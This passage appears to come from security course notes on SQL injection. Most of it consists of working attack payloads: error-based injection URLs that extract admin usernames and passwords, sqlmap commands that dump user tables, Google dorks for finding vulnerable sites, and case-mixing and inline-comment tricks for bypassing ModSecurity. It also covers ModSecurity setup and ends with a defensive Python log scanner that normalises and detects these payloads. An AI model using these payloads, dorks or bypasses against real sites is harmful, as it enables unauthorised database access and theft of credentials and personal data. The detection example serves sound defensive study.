- 1 | 0 | 0 |
- 1 | 1 | 1 |
- Checking the Last True Condition it states :
- 1 & 1 = 1 ie; 1*1=1 or True*True = True
- MAKING THIS TRUE CONDITION FALSE
- 1 & 0 = 0 ie; 1*0=0 or True*False = False
- Error-based SQL injection works by generating an error condition in the SQL syntax, so that the database responds with the error along with the sensitive data.
- DEMONSTRATION
- ===============
- Normally a SQL syntax can go like:
- ?id=10 | ?id=10 and 1 =1 ; //TRUE
- Which means a condition is true and it will return the genuine website.
- So, we can change it and create an error in the SQL command by:
- ?id=10 and 1=0; //FALSE
- Which will create and return errors from the database.
- CONDITIONS OF ERROR BASED SQLI
- ===============================
- = Only one query can execute at a particular time, unlike finding out the table names etc. as we do in union-based.
- = It works on the basis of Last In First Out (LIFO).
- = Only the top table of the database can be accessed at a single time. The same goes for columns and then for rows.
- ----
- First, the same as in union-based SQLi, we start by finding the number of columns and the vulnerable column. Suppose the vulnerable column is 10.
- After creating an error, we start executing the command and extracting the data from the first table of the database.
- For selecting the top (first) table (because we cannot go directly to an nth column),
- = ?id=10 and 1=0 select top 1 table_name from information_schema.tables
- This will extract and give the data of the first table from the database, including its name and other entities. If the data is juicy then extract it, else we go for the next tables and columns.
- ----
- For deselecting the top/current table and selecting/extracting the next table,
- = ?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in ("Name of the previous tables")
- Here we are selecting the next top table, excluding the previous one, and then extracting its data through the database errors. For example, if the first top table is named "Images", the query will be:
- ?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in ("images", "guestbook")
- ----
- After getting through to our juicy table, we go for the data situated in its columns.
- = ?id=10 and 1=0 select top 1 column_name from information_schema.columns where table_name not in ("images")
- Here we get the data of the extracted columns which are not of the table named Images.
- DEMO
- ====
- http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6--+
- http://www.target.com/index.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--+
- We will get the version printed on the web page.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Here is our query to get the database.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Now we have to get the tables. We want the tables from the primary database.
- Here is the query for tables from the primary database.
- Increase the value of LIMIT from LIMIT 0,1 to LIMIT 1,1, LIMIT 2,1, LIMIT 3,1 until you get your desired table name.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xADMIN limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Now we have to get the column names from the table name. We got the table admin, so let's get the columns from the table admin. Here is the query for getting the column names from the table admin.
- To get the columns from the table admin we have to encode its name in hex, and then we can execute our query.
- Here is that part of our query.
- table_name=ADMIN
- Here is the hex value of admin = 61646d696e
- Put it after 0x to build our correct query.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Increase the value of LIMIT: LIMIT 0,1, LIMIT 1,1, LIMIT 2,1 until we get column names like username and password.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x3a,COLUMN_NAME_2) as char),0x3a)) from TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- After we get column names like username and password, the next step is to extract the data from these columns.
- We put TABLENAME=admin
- And
- Column_name_1=username
- Column_name_2=password
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password) as char),0x3a)) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- STACKED QUERY SQL INJECTION
- ============================
- Stacked query SQL injection is the one that executes by terminating the original query and adding a new one; it makes it possible to modify data and call stored procedures, such as creating, deleting and modifying the database and its entities. This technique is massively used in SQL injection attacks and understanding its principle is essential to a sound understanding of this security issue.
- This can be done by SQL injection automated tools like "SQLMAP" etc.
- SQLMAP --> Python based command line tool for automating SQL injection
- http://sqlmap.org/
- Python 2.7 --> https://www.python.org/download/releases/2.7/
- HAVIJ --> Illegal tool, GUI based
- SQLMAP
- ======
- 1.
- sqlmap.py
- 2. To test if the website is up or not, or if it is vulnerable or not
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1
- 3. To get the database ----> --dbs
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 --dbs
- available databases [2]:
- [*] acuart
- [*] information_schema
- 4. To get the tables
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart --tables
- Database: acuart
- [8 tables]
- +-----------+
- | artists |
- | carts |
- | categ |
- | featured |
- | guestbook |
- | pictures |
- | products |
- | users |
- +-----------+
- 5. To get the columns
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart -T users --columns
- Database: acuart
- Table: users
- [8 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | address | mediumtext |
- | cart | varchar(100) |
- | cc | varchar(100) |
- | email | varchar(100) |
- | name | varchar(100) |
- | pass | varchar(100) |
- | phone | varchar(100) |
- | uname | varchar(100) |
- +---------+--------------+
- 6. To dump the data from the columns
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart -T users -C name,uname,pass --dump
- Database: acuart
- Table: users
- [1 entry]
- +------------+-------+------+
- | name | uname | pass |
- +------------+-------+------+
- | John Smith | test | test |
- +------------+-------+------+
- HAVIJ
- =====
- GUI Based tool
- Google Dorks
- ============
- Advance Google Searching Techniques
- -----------------------------------
- Google Hacking Database.
- Arijit Singh
- Whenever we search anything on Google, the Google search engine shows us the data in 3 different colours.
- Blue --> Headings --> Titles
- Green -> Links and urls
- Black -> Content
- intitle: inception
- inurl: inception
- intext: inception
- title--> movie
- url --> inception
- intitle:movie and inurl:inception
- indexof:/inception
- hacking filetype:pdf
- SQL Injection Vulnerable Web Sites
- ----------------------------------
- inurl:php?id=
- inurl:/view/viewer_index.shtml
- Session 12
- ==========
- Introduction to Firewall
- ------------------------
- Firewall
- --------
- It is an extra security layer which helps in securing our web application and web site. It acts as the middle layer in the data transmission between the user and the server.
- A firewall acts as a filter. It filters out unwanted and malicious packets. A firewall works on the basis of signatures and the permutations and combinations of queries transmitted by the user. Knowledgebase --> it acts just like a database for signatures and combinations.
- There are two types of firewall:
- 1. Software Solution Firewall
- 2. Hardware Solution Firewall
- Software Solution Firewall
- --------------------------
- These are software packages which are installed on the server.
- Microsoft windows Firewall
- Hardware Solution Firewall
- --------------------------
- They are hardware devices which act as the man in the middle and filter out the packets which are malicious.
- MOD Security
- WAF --> Web Application Firewall
- --------------------------------
- MOD Security
- ------------
- Installation of Mod Security
- ============================
- Installing and configuring ModSecurity
- Step 1: open terminal and type
- $ apt-get update
- $ apt-get upgrade
- $ apt-get install apache2
- Step 2: $ sudo apt-get install libapache2-modsecurity
- Step 3: Now we need to place a modsecurity.conf configuration file into the /etc/modsecurity
- $ sudo cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
- now open
- $ sudo nano /etc/modsecurity/modsecurity.conf
- Find this line:
- SecRuleEngine DetectionOnly
- and change it to:
- SecRuleEngine On
- Step 4: now check the apache2 log directory:
- $ ls /var/log/apache2
- You should see three files: access.log, error.log and other_vhosts_access.log.
- Now restart the apache2 service and check this directory again
- $ sudo service apache2 reload
- $ ls /var/log/apache2
- A new log called modsec_audit.log was created
- Step 5: now check the modsecurity-crs directory
- $ ls /usr/share/modsecurity-crs/
- the directories: activated_rules, base_rules, experimental_rules and optional_rules
- Step 6: to activate all of the rules in the base_rules and optional_rules directories, execute the following commands in a terminal:
- $ cd /usr/share/modsecurity-crs/base_rules
- $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/base_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done
- $ cd ..
- $ cd optional_rules
- $ cd /usr/share/modsecurity-crs/optional_rules
- $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/optional_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done
- $ cd ..
- $ cd experimental_rules
- $ cd /usr/share/modsecurity-crs/experimental_rules
- $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/experimental_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done
- Step 7: we need to tell apache where to find the activated rules. Open the /etc/apache2/mods-available/security2.conf file.
- $ sudo nano /etc/apache2/mods-available/security2.conf
- At the end of the file just before </IfModule> enter the following lines:
- Include "/usr/share/modsecurity-crs/*.conf"
- Include "/usr/share/modsecurity-crs/activated_rules/*.conf"
- save it
- Step 8: We must enable the headers module, this allows ModSecurity to control and modify the HTTP headers for both requests and responses.
- $ sudo a2enmod headers
- Now restart apache:
- $ sudo service apache2 restart
- cd /etc/apache2/sites-available
- ls ---> 000-default.conf
- sudo nano 000-default.conf
- edit
- ProxyPass --> Web application IP
- ProxyPassReverse --> Web application IP
- save and exit
- sudo service apache2 restart
- Bypassing MOD_SECURITY
- ======================
- union select 1,2--+
- Block
- Mix Cases
- UnIoN SeLeCt 1,2--+
- Inline Executable Comments
- /*!UnIoN*/ /*!SeLeCt*/ 1,2--+
- /*!UnIoN*/ /*!SeLeCt*/ 1,table_name from /*information_schema.tables*/--+
- BLIND SQL INJECTION
- ===================
- Blind SQL injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application's response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQLi. This type of SQL injection is identical to normal SQL injection; the only difference is the way the data is retrieved from the database.
- 1. Blind Boolean
- 2. Time Based SQL Injection
- http://newsletter.com/items.php?id=2
- ------------------------------------
- select title,description from items where id=2
- ----------------------------------------------
- http://newsletter.com/items.php?id=2 and 1=2
- select title,description from items where id=2 and 1=2
- Demo
- ====
- 1
- 1'
- 1' and 1=0 # ---> False
- 1' and 1=1 # ---> True
- 1' and 1=0 order by 1 # --> No Result ---> Generic error
- 1' and 1=1 order by 1 # --> Result --> normal result
- 1' and 1=0 order by 2 # --> No result
- 1' and 1=1 order by 2 # ---> Result
- 1' and 1=0 order by 3 # ---> No Result
- 1' and 1=1 order by 3 # ---> No Result ---> True ---> there are 2 number of columns
- 1' and 1=0 union select 1,2 #
- ID: 1' and 1=0 union select 1,2 #
- First name: 1
- Surname: 2
- 1' and 1=1 union select 1,2 #
- ID: 1' and 1=1 union select 1,2 #
- First name: admin
- Surname: admin
- ID: 1' and 1=1 union select 1,2 #
- First name: 1
- Surname: 2
- 1' and 1=0 union select NULL,2 # --> No data
- 1' and 1=1 union select null,2 #---> Shows Data
- ID: 1' and 1=1 union select null,2 #
- First name: admin
- Surname: admin
- ID: 1' and 1=1 union select null,2 #
- First name:
- Surname: 2
- 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,1,1)=4 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
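- An added example, not from the notes and not ModSecurity's own rule syntax, that covers both the mod_security bypasses from Session 12 (mixed case, /*!...*/ inline comments) and the blind payloads in this demo: it normalises each request's query string before matching, so the evasions collapse onto the same signatures. The Apache-style log lines are constructed here, and `normalise`, `classify` and `scan_log` are this example's own names.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not real traffic). The request strings reuse the
# payloads from these notes, URL-encoded the way a browser sends them.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jun/2018:10:01:02 +0530] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Jun/2018:10:01:09 +0530] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UnIoN%20SeLeCt%201,2--+&Submit=Submit HTTP/1.1" 200 640',
    '10.0.0.5 - - [10/Jun/2018:10:01:15 +0530] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20/*!UnIoN*/%20/*!SeLeCt*/%201,table_name%20from%20/*information_schema.tables*/--+&Submit=Submit HTTP/1.1" 200 2048',
    '10.0.0.5 - - [10/Jun/2018:10:01:21 +0530] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20and%201=0%20union%20select%20null,substr(@@version,1,1)=5%20%23&Submit=Submit HTTP/1.1" 200 400',
    '10.0.0.5 - - [10/Jun/2018:10:01:30 +0530] "GET /login.php?username=1%27or%271%27%3D%271&password=x HTTP/1.1" 302 0',
]

# /*!...*/ is executed by MySQL, and /*...*/ can hide tokens from a naive
# matcher, so both are unwrapped and their contents kept for inspection.
COMMENT = re.compile(r"/\*!?(.*?)\*/", re.S)

SIGNATURES = {
    "union-select": re.compile(r"\bunion\b.*\bselect\b"),
    "boolean-probe": re.compile(r"\b(and|or)\b\s*\d+\s*=\s*\d+"),  # and 1=0 / or 1=1
    "quote-or": re.compile(r"'\s*or\s*'"),                            # 1'or'1'='1
    "info-schema": re.compile(r"information_schema\.(tables|columns)"),
    "version-probe": re.compile(r"substr\s*\(\s*@@version"),
}


def normalise(query):
    """URL-decode, unwrap comments, lower-case and collapse whitespace.

    After this step 'UnIoN SeLeCt', '/*!UnIoN*/ /*!SeLeCt*/' and
    'union select' are the same string.
    """
    text = unquote_plus(query)          # %27 -> ', '+' -> space
    text = COMMENT.sub(r"\1", text)
    text = text.lower()
    return re.sub(r"\s+", " ", text)


def classify(query):
    """Sorted list of signature names that match the normalised query string."""
    norm = normalise(query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(norm))


def scan_log(lines):
    """Return (request path, matched signatures) for each suspicious GET line."""
    hits = []
    for line in lines:
        m = re.search(r'"GET ([^ ]+) HTTP', line)
        if not m:
            continue
        path = m.group(1)
        query = path.split("?", 1)[1] if "?" in path else ""
        sigs = classify(query)
        if sigs:
            hits.append((path, sigs))
    return hits


if __name__ == "__main__":
    for path, sigs in scan_log(SAMPLE_LOG):
        print(", ".join(sigs), "<-", path)
```

- The normalisation is what makes the case-mixing and inline-comment tricks listed under "Bypassing MOD_SECURITY" ineffective against this check; a matcher that runs on the raw request line misses all but the plain `union select`.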